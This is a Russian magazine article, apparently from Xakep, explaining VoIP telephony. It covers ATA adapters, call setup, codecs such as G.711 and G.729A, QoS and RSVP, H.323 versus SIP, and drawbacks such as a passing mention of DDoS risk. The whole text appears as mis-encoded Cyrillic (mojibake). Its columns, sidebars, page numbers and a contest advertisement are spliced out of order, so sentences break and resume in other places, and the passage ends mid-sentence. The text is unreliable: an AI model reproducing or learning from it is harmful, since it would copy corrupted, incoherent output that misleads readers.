Äëÿ îáû÷íîãî ïîëüçîâàòåëÿ òåõíîëîãèÿ VoIP ìîæåò ïðåäñòàâëÿòüñÿ ïî-ðàçíîìó. Ïîýòîìó è èñïîëüçîâàòü îí åå ìîæåò òàêæå ðàçëè÷íûìè ñïîñîáàìè. Íàïðèìåð, ñ ïîìîùüþ êîìïüþòåðà.  èíåòå ñóùåñòâóåò íåìàëî êîìïàíèé, êîòîðûå ïðåäëàãàþò îðãàíèçîâàòü ãîëîñîâóþ ñâÿçü ìåæäó êîìïüþòåðàìè. Îò ïîëüçîâàòåëÿ ïðè ýòîì òðåáóåòñÿ ñîâñåì íåìíîãîå: òåëåôîííàÿ ãàðíèòóðà (ìèêðîôîí ñ íàóøíèêàìè), çâóêîâàÿ êàðòà è äîñòóï â Èíòåðíåò, æåëàòåëüíî øèðîêîïîëîñíûé DSL è ò.ï. Ïðèìåð òàêîé êîìïàíèè — íåäàâíî íàøóìåâøàÿ Skype (www.skype.com). Ïîäîáíîãî ðîäà ïðîâàéäåðû îáû÷íî íå áåðóò ïëàòó çà ñîåäèíåíèÿ òèïà êîìïüþòåð-êîìïüþòåð, ïîñêîëüêó ñâÿçü óñòàíàâëèâàåòñÿ ìåæäó ïîëüçîâàòåëÿìè íàïðÿìóþ è íå òðåáóåò ó÷àñòèÿ VoIP-øëþçîâ. Ñ äðóãîé ñòîðîíû, òàêèå êîìïàíèè äåëàþò íåïëîõèå äåíüãè íà îáñëóæèâàíèè çâîíêîâ ñ êîìïüþòåðà íà îáû÷íûå ãîðîäñêèå òåëåôîíû. Âòîðîé âàðèàíò ñâÿçàí ñ ïðèìåíåíèåì ñïåöèàëüíûõ àäàïòåðîâ äëÿ àíàëîãîâûõ òåëåôîíîâ (ADA, Analog Telephone Adaptor). Ê òàêîìó óñòðîéñòâó ìîæíî ïîäêëþ÷èòü ñàìûé îáûêíîâåííûé òåëåôîí, ñ êîòîðûì òû, âåðîÿòíî, çíàêîì âñþ ñâîþ ñîçíàòåëüíóþ æèçíü, è âïîëíå óñïåøíî èñïîëüçîâàòü åãî äëÿ

Äëÿ ïðèìåðà ðàññìîòðèì ïðîöåññ óñòàíîâêè ñîåäèíåíèÿ ñ ïîìîùüþ ATAàäàïòåðà. ß íå áóäó ñåé÷àñ ãëóáîêî âäàâàòüñÿ â ïîäðîáíîñòè, òàê êàê îñíîâíûå ïðèíöèïû è ïðîòîêîëû áóäóò ðàññìîòðåíû íèæå. 1 Àáîíåíò áåðåò òðóáêó òåëåôîíà, êîòîðûé ïîäêëþ÷åí ê ATA-àäàïòåðó. Ïîñêîëüêó òåõíîëîãèÿ VoIP âûïîëíåíà ìàêñèìàëüíî ïðîçðà÷íî äëÿ ïîëüçîâàòåëÿ, îí âðÿä ëè çàìåòèò ðàçíèöó ïî ñðàâíåíèþ ñ îáû÷íîé òåëåôîííîé ëèíèåé. Çäåñü áóäóò òå æå ñàìûå ãóäêè, òîò æå ïðèíöèï íàáîðà íîìåðà è ò.ä. 2 Åñëè ñîåäèíåíèå â Èíòåðíåò óñòàíîâëåíî, è ATA-äåâàéñ íàñòðîåí êîððåêòíî, òî â îòâåò ïîëüçîâàòåëþ áóäåò ïîñëàí òîíàëüíûé ñèãíàë. Åãî ìîæíî ðàñøèôðîâàòü, êàê «âñå â ïîðÿäêå, òàê ÷òî ìîæíî ðàáîòàòü». 3 Äàëåå àáîíåíò, êàê îáû÷íî, ââîäèò íóæíûé åìó íîìåð ñ ïîìîùüþ òîíàëü-

XÀÊÅÐ 01 /85/ 06

VoIP-òåëåôîíèè. Àäàïòåð ïðåäñòàâëÿåò ñîáîé àíàëîãî-öèôðîâîé ïðåîáðàçîâàòåëü (è íàîáîðîò), òî åñòü íåîáõîäèì äëÿ òîãî, ÷òîáû ïðåîáðàçîâàòü àíàëîãîâûå ñèãíàëû, ïîñòóïàþùèå ñ òðóáêè, â öèôðîâîé âèä è îòïðàâëÿòü ÷åðåç ïðîâàéäåðà íà VoIP-øëþç. Ïðè ýòîì âñå íåîáõîäèìûå íàñòðîéêè: ïàðàìåòðû ñâÿçè, àäðåñà øëþçà è ò.ï. — âûäàåò îïåðàòîð IP-òåëåôîíèè. IP-òåëåôîí — ýòî òðåòèé âàðèàíò äëÿ òåõ, êòî õî÷åò âîñïîëüçîâàòüñÿ VoIP. Øòóêîâèíà äîâîëüíî ýêçîòè÷åñêàÿ, íî â áóäóùåì îáåùàåò ñòàòü îñíîâíûì ñðåäñòâîì äëÿ ãîëîñîâîãî îáùåíèÿ. Âíåøíå IP-òåëåôîí íè÷åì íå îòëè÷àåòñÿ îò îáû÷íîãî àíàëîãîâîãî, íî âìåñòî ïðèâû÷íîãî ðàçúåìà RJ-11 íà íåì ìîíòèðîâàí ðàçúåì RJ-45, òî÷íî òàêîé æå, êàê è íà òâîåé ñåòåâîé êàðòå. Òàêîé òåëåôîí ïîñðåäñòâîì âèòîé ïàðû íàïðÿìóþ ïîäêëþ÷àåòñÿ ê ðîóòåðó â ëîêàëüíîé ñåòè. Äàëåå ïàêåòû ïåðåíàïðàâëÿþòñÿ ëèáî íà âíóòðåííèé VoIP-øëþç (åñëè VoIP-ñâÿçü íàëàæåíà íà âíóòðèîôèñíîì óðîâíå), ëèáî íà âíåøíèé øëþç IP-òåëåôîíèè, ïðèâÿçàííûé ê êàêîìó-òî êîíêðåòíîìó òåëåôîííîìó îïåðàòîðó. Óæå ñåé÷àñ ìîæíî íàéòè ïðîòîòèïû IP-òåëåôîíîâ ñ ïîääåðæêîé Wi-Fi, ïîçâîëÿþùèå àáîíåíòàì VoIP ñîâåðøàòü çâîíêè, íàõîäÿñü â ïîëå äåéñòâèÿ ëþáîãî õîòñïîòà.

íîãî íàáîðà. Öèôðû íîìåðà ðàñïîçíàþòñÿ ATA-äåâàéñîì è âðåìåííî çàïèñûâàþòñÿ â ñïåöèàëüíûé áóôåð. 4 Êàê òîëüêî âñå öèôðû íîìåðà íàáðàíû, ôîðìèðóåòñÿ ñïåöèàëüíûé ïàêåòçàïðîñ. Îí îòïðàâëÿåòñÿ â öåíòð îáðàáîòêè çâîíêîâ (Call Processor), êîòîðûé, êàê ïðàâèëî, ïðåäñòàâëÿåò ñîáîé äîðîãîñòîÿùåå àïïàðàòíîå ðåøåíèå, ïðåäíàçíà÷åííîå äëÿ îáñëóæèâàíèÿ ïðîãðàììíûõ êîììóòàòîðîâ (Soft Switches). Ïîñëåäíèå ñîäåðæàò èíôîðìàöèþ î ïîëüçîâàòåëÿõ (èìÿ þçåðà, åãî íîìåð è ïðèâÿçàííûé IP-àäðåñ), à òàêæå óïðàâëÿþò ïðîöåññîì óñòàíîâêè ñîåäèíåíèÿ. 5 Ïåðâûì äåëîì öåíòð îáðàáîòêè çâîíêîâ ïðîâåðÿåò ïðàâèëüíîñòü ââåäåííûõ äàííûõ. Åñëè íîìåð èìååò íåêîððåêòíûé ôîðìàò, òî àáîíåíòó âûäàåòñÿ ñîîòâåòñòâóþùåå ãîëîñîâîå ñîîáùåíèå. Åñëè æå âñå â ïîðÿäêå, òî îñóùåñòâëÿåòñÿ ñëåäóþùèé ýòàï — ïîèñê ïî áàçå

äàííûõ. Çäåñü âñå ïðîñòî: VoIP-êîììóòàòîð èùåò ïî ñâîåé áàçå IP-àäðåñ âûçûâàåìîãî àáîíåíòà è ïûòàåòñÿ óñòàíîâèòü ñ íèì ñâÿçü, òî åñòü îòïðàâëÿåò ñïåöèàëüíûé ïàêåò — «çâîíîê». 6 Ó âòîðîãî àáîíåíòà çâîíèò òåëåôîí. Ïîñëå òîãî êàê îí âîçüìåò òðóáêó, ìåæäó äâóìÿ àáîíåíòàìè áóäåò óñòàíîâëåíà ñåññèÿ. Ýòî çíà÷èò, ÷òî êàæäàÿ èç ñòîðîí áóäåò æäàòü ïàêåòîâ ñ ãîëîñîâûìè äàííûìè îò äðóãîé.  òå÷åíèå âñåãî ðàçãîâîðà VoIP-óñòðîéñòâà íåïðåðûâíî îáìåíèâàþòñÿ ìåæäó ñîáîé ïàêåòàìè, ïðè÷åì ATA çàíèìàåòñÿ ñðàçó äâóìÿ ïðîöåññàìè: êîäèðîâàíèåì ðå÷è â öèôðîâîé âèä è ïðåîáðàçîâàíèåì öèôðîâûõ äàííûõ â àóäèîñèãíàë. 7 Ñåññèÿ çàêàí÷èâàåòñÿ, åñëè îäíà èç ñòîðîí ïîëîæèò òðóáêó. Îäíàêî ñâÿçü ìîæåò îáîðâàòüñÿ è ïî äðóãèì ïðè÷èíàì, íàïðèìåð, èç-çà ïîòåðè ñâÿçè ñ Èíòåðíåòîì.

ÍÀ ÄÅËÅ

ÊÀÊ ÏÐÎÈÑÕÎÄÈÒ ÑÎÅÄÈÍÅÍÈÅ

031


PC_ZONE ///// ISSUE

Êîììåð÷åñêèå ïðåäëîæåíèÿ Skype â îòíîøåíèè çâîíêîâ íà îáû÷íûå òåëåôîíû íå î÷åíü âûãîäíû. Ñåðâèñ Yahoo ïðåäëàãàåò òàêèå çâîíêè: 1 öåíò çà ìèíóòó (íà òåððèòîðèþ ÑØÀ) è 1,9 öåíòà çà ìèíóòó (íà òåððèòîðèþ åùå 30 ñòðàí). Òàêæå çà $3 â ìåñÿö èëè $30 â ãîä ìîæíî âûáðàòü íîìåð Yahoo, íà êîòîðûé ê âàì ìîãóò ïîñòóïàòü âõîäÿùèå çâîíêè. Ýòî îôèãåííîå ïîäñïîðüå, åñëè òû õî÷åøü îðèåíòèðîâàòüñÿ íà çàïàäíûé ðûíîê.

ÊÎÄÈÐÎÂÀÍÈÅ ÈÍÔÎÐÌÀÖÈÈ

Êàêîé áû òèï ñîåäèíåíèÿ VoIP íè èñïîëüçîâàëñÿ, èñòî÷íèêîì äàííûõ âñåòàêè ÿâëÿåòñÿ ÷åëîâå÷åñêàÿ ðå÷ü. Âàæíî ïîíèìàòü, ÷òî ãîëîñîâûå ñîîáùåíèÿ — ýòî íå÷òî àíàëîãîâîå, êîòîðîå íåëüçÿ ïðîñòî âçÿòü è îòïðàâèòü ÷åðåç Ñåòü. Äëÿ ýòîãî íóæíî õîòÿ áû ïðåäñòàâèòü ðå÷åâîé ñèãíàë â öèôðîâîì âèäå, òî åñòü â âèäå íóëåé è åäèíè÷åê, êîòîðûå ìîæíî ðàçìåñòèòü â IP-ïàêåòàõ è îòïðàâèòü ïîëó÷àòåëþ. Çàäà÷àìè êîäèðîâàíèÿ è äåêîäèðîâàíèÿ çàíèìàþòñÿ êîäåðû è äåêîäåðû, êîòîðûå î÷åíü ÷àñòî ÿâëÿþòñÿ åäèíûì öåëûì. Âàæíóþ ðîëü èãðàåò êîäåê èëè àëãîðèòì, êîòîðûé èñïîëüçóåòñÿ êîäåðîì è äåêîäåðîì äëÿ îöèôðîâêè ãîëîñà, è íàîáîðîò.  VoIP ïðèìåíÿþòñÿ ðàçëè÷íûå êîäåêè, íî â îñíîâå êàæäîãî èç íèõ ëåæèò íåïðåðûâíîå ñýìïëèðîâàíèå àóäèîïîòîêà. Êîäåê îáðàáàòûâàåò ïîñòóïèâøèå ñ ìèêðîôîíà äàííûå íåñêîëüêî òûñÿ÷ ðàç â ñåêóíäó, òàêèì îáðàçîì ïîëó÷àþòñÿ ìèíèìàëüíûå îòðûâêè (ñýìïëû) ãîëîñîâîãî ñîîáùåíèÿ. Êàæäûé èç íèõ ïðåîáðàçîâûâàåòñÿ â öèôðîâîé âèä è ñæèìàåòñÿ äëÿ ïîñëåäóþùåé ïåðåäà÷è. Êîãäà íåñêîëüêî òûñÿ÷ ýòèõ îòðûâêîâ ñîåäèíÿþòñÿ â åäèíîå öåëîå, ìèêðîñêîïè÷åñêèå ïàóçû ìåæäó íèìè ñòàíîâÿò-

ÂÑß ÏÐÎÁËÅÌÀ Â ÇÀÄÅÐÆÊÀÕ

Äëÿ êîìôîðòíîé ïåðåäà÷è ãîëîñà íóæåí øèðîêèé êàíàë. Íî äàæå î÷åíü âûñîêàÿ ïðîïóñêíàÿ ñïîñîáíîñòü íå ïîìîæåò òåáå íàñëàäèòüñÿ ðàçãîâîðîì, åñëè çàäåðæêè ñ äîñòàâêîé ïàêåòîâ äî àäðåñàòà áóäóò äîñòèãàòü õîòÿ áû ïîëîâèíû ñåêóíäû. Âñïîìíè ëåâûé ïèðàòñêèé äèñê ñî ñâåæèì áëîêáàñòåðîì, â êîòîðîì èç-çà ÷üèõ-òî êðèâûõ ðóê ïðîèçîøëà ðàññèíõðîíèçàöèÿ âèäåî è çâóêà. Ñìîòðåòü òàêîå êèíî íåâîçìîæíî, òàêæå íåðåàëüíî áóäåò è ðàçãîâàðèâàòü ñ çàäåðæêàìè. Âîò ïî÷åìó òàê âàæíî ñíèçèòü èõ äî ìèíèìóìà è ãàðàíòèðîâàòü, ÷òî îíè íå âîçðàñòóò âûøå îïðåäåëåííîãî ïîòîëêà. Äëÿ ýòîãî ïðèìåíÿåòñÿ ñðàçó íåñêîëüêî ìåòîäîâ, êîòîðûå â ñàìûõ ðàçíûõ ñèòóàöèÿõ äîïîëíÿþò äðóã äðóãà è âûäàþò ìàêñèìàëüíûé ðåçóëüòàò. Ðåçåðâèðîâàíèå ÷àñòè ïîëîñû èñêëþ÷èòåëüíî äëÿ VoIP — ýòî ñàìîå î÷åâèäíîå è, ÷òî î÷åíü âàæíî, ýôôåêòèâíîå ðåøåíèå.  îáû÷íûõ ñåòÿõ Ethernet ñóùåñòâóåò òàêîå ïîíÿòèå, êàê êà÷åñòâî îáñëóæèâàíèÿ (QoS — Quality of Service). Ñåðâèñ âûäåëÿåò ÷àñòü êàíàëà ñïåöèàëüíî äëÿ ïåðåäà÷è ÷èñòî òåõíè÷åñêîé èíôîðìàöèè, ÷òîáû îáåñïå÷èòü áëàãîïðèÿòíûå óñëîâèÿ äëÿ âçàèìîäåéñòâèÿ âñåõ êëþ÷åâûõ óçëîâ ñåòè, äàæå åñëè ëîêàëêà áóäåò èñïûòûâàòü ñâåðõíàãðóçêè. Òåõíîëîãèÿ VoIP ïðèìåíÿåò ïîõîæèå ïðèíöèïû, íî îðèåíòèðîâàííûå íà ïåðåäà÷ó èìåííî ãîëîñîâûõ äàííûõ. Ðàçðàáîò÷èêè ñòàíäàðòà ïîäñ÷èòàëè, ÷òî IP-ïàêåòû ñ ãîëîñîâûìè äàííûìè ðàöèîíàëüíåå îòïðàâëÿòü áîëüøèìè (îòíîñèòåëüíî ïàêåòîâ) áëîêàìè, òàê êàê òîëüêî â ýòîì ñëó÷àå óäàñòñÿ ýôôåêòèâíî èñ-

032

Åùå ñ íåçàïàìÿòíûõ âðåìåí ñóùåñòâîâàëè ïðîãðàììû, ïîçâîëÿþùèå çàïèñûâàòü êîðîòêèå ãîëîñîâûå ñîîáùåíèÿ è îòïðàâëÿòü èõ ïî å-mail. Òàê ñêàçàòü, ïðåäøåñòâåííèêè òåõíîëîãèè VoIP.

ñÿ íåçàìåòíûìè äëÿ ÷åëîâå÷åñêîãî óõà, ïîýòîìó çâó÷àíèå ïðàêòè÷åñêè íå îòëè÷àåòñÿ îò òîãî, ÷òî ìû ïðèâûêëè ñëûøàòü ïî îáû÷íîìó òåëåôîíó. Êîëè÷åñòâî ðàçáèåíèé â ñåêóíäó íàïðÿìóþ çàâèñèò îò èñïîëüçóåìîãî êîäåêà. Òàê G.711 äàåò ìàêñèìàëüíîå êà÷åñòâî çâó÷àíèå è îáðàáàòûâàåò àíàëîãîâûé ïîòîê 64,000 ðàç â ñåêóíäó, ÷òî òðåáóåò íåìàëûõ âû÷èñëèòåëüíûõ çàòðàò è, åñòåñòâåííî, äîâîëüíî øèðîêîãî êàíàëà. Äðóãèå êîäåêè òàêèì òðóäîëþáèåì ïîõâàñòàòüñÿ íå ìîãóò, ïîýòîìó îáðàùàþòñÿ ê àíàëîãîâûì äàííûì 32,000 è äàæå 8,000 â ñåêóíäó. Íî íå äóìàé, ÷òî ýòîãî ìàëî: íàèáîëåå ðàñïðîñòðàíåííûé êîäåê — G.729A — ðàáîòàåò êàê ðàç íà ñêîðîñòè â 8,000 è ñ÷èòàåòñÿ çîëîòîé ñåðåäèíîé ìåæäó êà÷åñòâîì çâóêà è çàòðàòàìè íà ïåðåäà÷è öèôðîâûõ äàííûõ.  îñíîâå êîäåêîâ ëåæàò ñëîæíûå àëãîðèòìû, êîòîðûå çàíèìàþòñÿ ðàçáèåíèåì àíàëîãîâûõ äàííûõ íà îòðûâêè, èõ ñæàòèåì è óïàêîâêîé. Íàèáîëåå èçâåñòíûì ñ÷èòàåòñÿ àëãîðèòì ñ íåïðîèçíîñèìûì íàçâàíèåì CS-ACELP (Conjugate Structure Algebraic Code Excited Linear Prediction). Îí èñïîëüçóåò îäíî î÷åíü ïðîñòîå, íî ÷ðåçâû÷àéíî ýôôåêòèâíîå ïðàâèëî: «Åñëè íèê-

òî íå ãîâîðèò, çíà÷èò, äàííûå ïåðåäàâàòü íå íóæíî». Êàçàëîñü áû, ÷òî â ýòîì òàêîãî? À â òîì, ÷òî âñå ñèãíàëüíûå ôðàãìåíòû ìîæíî óñëîâíî ðàçäåëèòü íà íåñêîëüêî òèïîâ: âîêàëèçèðîâàííûå (ãîëîñ ÷åëîâåêà), íåâîêàëèçèðîâàííûå, ïåðåõîäíûå è ïàóçû. Ïðè îäíîé è òîé æå äëèòåëüíîñòè è êà÷åñòâå êîäèðîâàíèÿ ðàçíûõ òèïîâ îòðûâêîâ òðåáóåòñÿ íåîäèíàêîâîå êîëè÷åñòâî áèòîâ (ïðè òîì, ÷òî ïàóçû íå íóæíî êîäèðîâàòü âîîáùå). Ñîîòâåòñòâåííî, ñêîðîñòü ïåðåäà÷è ðàçíûõ òèïîâ îòðûâêîâ òàêæå ñèëüíî âàðüèðóåòñÿ. Ïî ýòîé ïðè÷èíå áûëî ïðèíÿòî ðåøåíèå èñïîëüçîâàòü ìåòîä ïåðåäà÷è ðå÷è ñ ðàçíîé ñêîðîñòüþ. Íåîáõîäèìàÿ ñêîðîñòü îïðåäåëÿåòñÿ ñïåöèàëüíûì êëàññèôèêàòîðîì, êîòîðûé íà îñíîâå àíàëèçà âõîäíûõ äàííûõ âûáèðàåò íóæíûé ìåòîä êîäèðîâàíèÿ. Íàèáîëåå ïðîñòûì êëàññèôèêàòîðîì ÿâëÿåòñÿ Voice Activity Detector (VAC), êîòîðûé óìååò îïðåäåëÿòü äâà ñîñòîÿíèÿ âõîäíûõ äàííûõ: ãîëîñ è ïàóçû. Ôðàãìåíòû, êîòîðûå áûëè êëàññèôèöèðîâàíû êàê ãîëîñ, ïåðåäàþòñÿ íà áîëüøîé ñêîðîñòè. Ïàóçû, ÷òî ñëåäîâàëî îæèäàòü, êîäèðóåòñÿ ñ ìåíüøåé äåòàëèçàöèåé è òðåáóþò äëÿ ïåðåäà÷è çíà÷èòåëüíî ìåíüøóþ ñêîðîñòü.

ïîëüçîâàòü âûäåëåííóþ ïîëîñó ïðîïóñêàíèÿ. Òàêîé ïîäõîä ñèëüíî óïðîùàåò ïðîöåäóðó óïðàâëåíèÿ î÷åðåäÿìè è ðàññòàíîâêè ïðèîðèòåòîâ äëÿ ðàçëè÷íîãî òèïà ïàêåòîâ, ÷òî ÿâëÿåòñÿ ñåðüåçíîé ïðîáëåìîé äëÿ âñåõ IP-ñåòåé. Ïðàâäà, ñòîèò îòìåòèòü, ÷òî äëÿ ñîçäàíèÿ áëîêà, äîñòàòî÷íîãî äëÿ îòïðàâêè, íåîáõîäèìî âðåìÿ. Êîíå÷íî, ýòî âðåìÿ ìèíèìàëüíî, íî âñå æå îíî ñîçäàåò äîïîëíèòåëüíóþ çàäåðæêó. Íåïîñðåäñòâåííî ðåçåðâèðîâàíèåì ðåñóðñîâ çàíèìàåòñÿ ñïåöèàëüíûé ïðîòîêîë RSVP (Resource ReSerVation Protocol). Ðàáîòàåò îí ñëåäóþùèì îáðàçîì: óçåë-îòïðàâèòåëü äî ïåðåäà÷è îòâåòñòâåííîé èíôîðìàöèè, òðåáóþùèé ïîâûøåííîãî êà÷åñòâà îáñëóæèâàíèÿ, ïîñûëàåò ïî ñåòè ñïåöèàëüíîå ñîîáùåíèå â ôîðìàòå ïðîòîêîëà RSVP.  ñîîáùåíèè ñîäåðæèòñÿ èíôîðìàöèÿ î òèïå äàííûõ, êîòîðûå áóäóò äàëåå ïåðåäàíû, à òàêæå çàïðîñ íà âûäåëåíèå ÷àñòè ïîëîñû. Êàæäûé ìàðøðóòèçàòîð íà ïóòè ñëåäîâàíèÿ ïàêåòà, ïîëó÷èâ òàêîå ñîîáùåíèå, ïðîâåðÿåò ñâîè ðåñóðñû è, åñëè òðåáîâàíèÿ âûïîëíèìû, óñòàíàâëèâàåò çàïðîøåííûé ïðèîðèòåò. Åñëè òàêîé âîçìîæíîñòè íåò, òî ìàðøðóòèçàòîð îòâåðãàåò çàïðîñ. Âñå ïðîñòî, íî ó òàêîãî ìåòîäà åñòü ñóùåñòâåííûé íåäîñòàòîê. Âûäåëåííàÿ òàêèì îáðàçîì ïîëîñà âñåãäà îñòàåòñÿ ïîñòîÿííîé: äàæå ïðè ñíèæåíèè àêòèâíîñòè îíà íå áóäåò èñïîëüçîâàíà äëÿ ïåðåäà÷è äðóãèõ äàííûõ, à çíà÷èò, ðåñóðñû áóäóò èñïîëüçîâàíû íåðàöèîíàëüíî. Äîïîëíèòåëüíî ê ïðîòîêîëó RSVP ïðèìåíÿåòñÿ ìåòîä Weighted Fair Queuing (WFQ). Åãî çàñëóãà â òîì, ÷òî îí ïîçâî-

XÀÊÅÐ 01 /85/ 06


! Ü Ò Ñ Î Ä Î Ë Î Ì É À ÏÐÎÙ » È ÆÓÐÍÀËÀ «ÕÀÊÅÐ

ÀÍÈÈ MICROSTAR ÊÎÍÊÓÐÑ ÎÒ ÊÎÌÏ ÎÅ ÑÒÀÐÜÅ ÎÍ ÓÆÅ ÎÁÌÅÍßË Ñ ÎÊÀÐÒÓ... ÄÅ ÂÈ ÍÀ ÍÎÂÅÍÜÊÓÞ ÅÄÜ! ÒÅÏÅÐÜ ÒÂÎß Î×ÅÐ

ÓÑËÎÂÈß: ÏÐÈÍÅÑÈ ÍÀÌ ÈËÈ ÏÐÈØËÈ ÏÎ ÏÎ×ÒÅ ÑÂÎÞ ÑÀÌÓÞ ÑÒÀÐÓÞ ÂÈÄÅÎÊÀÐÒÓ ( ÐÀÁÎ×ÓÞ). ÅÑËÈ ÎÍÀ ÄÅÉÑÒÂÈÒÅËÜÍÎ ÎÊÀÆÅÒÑß ÄÐÅÂÍÅÉ, ÒÎ Ó ÒÅÁß ÅÑÒÜ ÂÎÇÌÎÆÍÎÑÒÜ ÂÛÈÃÐÀÒÜ ÒÎÏÎÂÓÞ ÌÎÄÅËÜ ÂÈÄÅÎÊÀÐÒÛ (P4N DIAMOND) ÎÒ MSI, ÏÎËÓ×ÈÒÜ MP3-ÏËÅÅÐ (MP3 MSI MEGASTICK 528) ÈËÈ ÂÅÁ-ÊÀÌÅÐÓ (MSI STARCAM+).

Ñâîå áàðàõëî ïðèíîñè ïî àäðåñó: 119992, Ìîñêâà, óë. Òèìóðà Ôðóíçå, äîì 11, ñòð. 44-45, «Ãåéì Ëýíä»


PC_ZONE ///// ISSUE

Íà äèñêå òû íàéäåøü ïîñëåäíèå âåðñèè êëèåíòîâ äëÿ îáùåíèÿ ãîëîñîì ÷åðåç Èíòåðíåò.

www.packetizer.com/voip/h323/standards.html ïîäðîáíåéøàÿ èíôà î ñåìåéñòâå ïðîòîêîëîâ H.323. www.faqs.org/rfcs/rfc3261.html - RFC 3261: ïðîòîêîë SIP.

ëÿåò îïðåäåëåííûì îáðàçîì äèôôåðåíöèðîâàòü òðàôèê íà ðàçëè÷íûå òèïû (ãîëîñ, âàæíàÿ òåõíè÷åñêàÿ èíôîðìàöèÿ, ïðîñòî äàííûå) è âûäåëÿòü äëÿ êàæäîãî èç íèõ îïðåäåëåííóþ ÷àñòü ïîëîñû ïðîïóñêàíèÿ. Åñëè îäèí èç òèïîâ íå èñïîëüçóåò ïîëíîñòüþ âûäåëåííóþ äëÿ íåãî ïîëîñó, òî ñâîáîäíûé ðåçåðâ ìîæåò áûòü îòäàí äëÿ ïåðåäà÷è äðóãèõ äàííûõ, ñ ìåíüøèì èëè áîëüøèì ïðèîðèòåòîì. Ñòîëü ãèáêèé ìåòîä ðåàëèçîâàí â äîðîãîñòîÿùåì îáîðóäîâàíèè ôèðìû Cisco.

ÏÐÎÒÎÊÎËÛ

ÍÅ ÁÅÇ ÌÈÍÓÑÎÂ

ÇÀÊËÞ×ÅÍÈÅ

034

Ìíîãèå çàäàþò âîïðîñ: êàêîé îáúåì òðàôèêà áóäåò êóøàòü VoIP? Çäåñü ìíîãîå çàâèñèò îò êîäåêà.  ñëó÷àå ñ g723 — ïðèìåðíî 1,5êá/ñåê. g711 — ~9êá â ñåêóíäó â êàæäóþ ñòîðîíó, g729A — ~3 Êá/ñåê. Íî íåîáõîäèìî ó÷èòûâàòü, ÷òî êîãäà òû ìîë÷èøü, òðàôèê íå èäåò îò òåáÿ ê ñîáåñåäíèêó, è íàîáîðîò, êîãäà ìîë÷èò îí, òû íå ïðèíèìàåøü âõîäÿùèé òðàôèê.

Åùå îäèí ñïîñîá îïòèìèçàöèè çàäåðæêè â ñåòè îñíîâûâàåòñÿ íà èñïîëüçîâàíèè ïðîòîêîëà RTCP (Real-Time Transport Control Protocol), èñïîëüçóþùèé ïðèíöèï àäàïòàöèè ê ñîñòîÿíèþ êàíàëà. Åñëè èíòåíñèâíîñòü òðàôèêà â ñåòè âîçðàñòåò, à âûäåëåííîé ïîëîñû ïðèëîæåíèþ áóäåò íå õâàòàòü, òî ìîæíî óìåíüøèòü ñâîè àïïåòèòû çà ñ÷åò íåêîòîðîé ïîòåðè êà÷åñòâà. Êàê òîëüêî âûäåëåííàÿ ïîëîñà áóäåò äîñòàòî÷íà äëÿ âîçâðàùåíèÿ ê èñõîäíûìè ïàðàìåòðàì, ïðèëîæåíèå òóò æå îñóùåñòâèò ïåðåõîä.

Îäíèì èç ìèíóñîâ òåõíîëîãèè VoIP ÿâëÿåòñÿ îòñóòñòâèå åäèíîãî è óòâåðæäåííîãî ñòàíäàðòà. Ïî ýòîé ïðè÷èíå ñåé÷àñ àêòèâíî èñïîëüçóþòñÿ ñðàçó äâà ïðîòîêîëà, ïðèíöèïèàëüíî îòëè÷àþùèõñÿ äðóã îò äðóãà. Ïåðâûé — H.323 — ïåðâîíà÷àëüíî ðàçðàáàòûâàëñÿ äëÿ îðãàíèçàöèè âèäåîêîíôåðåíöèé â ðåàëüíîì âðåìåíè, íî âïîëíå ïðèãîäåí äëÿ ïåðåäà÷è òîëüêî çâóêà. Ïî áîëüøîìó ñ÷åòó, ýòî äàæå íå îäèí ïðîòîêîë, à öåëîå ñåìåéñòâî, êàæäûé ÷ëåí êîòîðîãî ïðåäíàçíà÷åí äëÿ âûïîëíåíèÿ êàêîé-òî êîíêðåòíîé çàäà÷è. Âòîðîé ïðîòîêîë — SIP (Session Initiation Protocol) — áûë ðàçðàáîòàí ñïåöèàëüíî äëÿ òåõíîëîãèè VoIP è äîëæåí áûë ðåøèòü âñå ïðîáëåìû, âîçíèêàþùèå ïðè èñïîëüçîâàíèè H.323.  åãî îñíîâå ëåæèò òîò æå ïðèíöèï, ÷òî è ó çíàêîìîãî òåáå HTTP: çàïðîñ — îòâåò. Âñå ñîîáùåíèÿ ïðîòîêîëà SIP ÿâëÿþòñÿ ïðîñòûì òåêñòîì, à êîäû âîçâðàòà — õîðîøî çíàêîìûìè âñåì ïîëüçîâàòåëÿì Èíòåðíåòà: 404 («àáîíåíò íå íàéäåí»), 200 (OK), 180 (Ringing — çâîíîê) è ò. ä. Ñóùåñòâóåò åùå íåñêîëüêî äðóãèõ ïðîòîêîëîâ, íî îíè íå íàøëè øèðîêîãî ðàñïðîñòðàíåíèÿ. Òàêîå ðàçíîîáðàçèå ïðîòîêîëîâ, âîçìîæíî, áûëî äàæå ïëþñîì, åñëè áû âñå îíè áûëè ñîâìåñòèìû ìåæäó ñîáîé. Îäíàêî íà ïðàêòèêå ýòî íå âñåãäà òàê.

Âïðî÷åì, îòñóòñòâèå åäèíîãî ñòàíäàðòà — ýòî åùå íå ñàìàÿ ñòðàøíàÿ áåäà. Åñòü äðóãèå ìèíóñû. Ïåðâûé è íàèáîëåå çíà÷èìûé èç íèõ — ìàëàÿ íàäåæíîñòü îòíîñèòåëüíî òðàäèöèîííûõ ñåòåé. VoIP ïåðåäàåò äàííûå ÷åðåç Èíòåðíåò, à çíà÷èò, îíè ïîäâåðæåíû ðàçëè÷íîãî ðîäà ïàãóáíûì âîçäåéñòâèÿì: âûñîêèì çàäåðæêàì, ïîòåðÿì ïàêåòîâ, ðåçêîìó èçìåíåíèþ ñîñòîÿíèÿ êàíàëà. Åñëè ïîòåðè â êàíàëå áóäóò äîñòèãàòü äàæå îäíîãî ïðîöåíòà, òî ýòî ñóùåñòâåííûì îáðàçîì ñêàæåòñÿ íà êà÷åñòâå ñâÿçè. Íå â ëó÷øóþ ñòîðîíó, åñòåñòâåííî. Îòñþäà âûòåêàåò è åùå îäèí ìèíóñ — ñîìíèòåëüíàÿ áåçîïàñíîñòü. Åñëè VoIP íàñòîëüêî ïðèâÿçàíà ê ñîñòîÿíèþ êàíàëà, òî çëîóìûøëåííèêó äîñòàòî÷íî áóäåò îðãàíèçîâàòü ìàññèðîâàííóþ DDoS-àòàêó íà îäíîãî èç àáîíåíòîâ èëè VoIP-øëþçîâ, ÷òîáû ïîëíîñòüþ ðàçîðâàòü ñâÿçü èëè ñâåñòè ðàçãîâîð íà íåò (âñïîìíè, ÷òî ïðîèñõîäèò ñ ðàçãîâîðîì ïî ìîáèëå â çîíå íåóâåðåííîãî 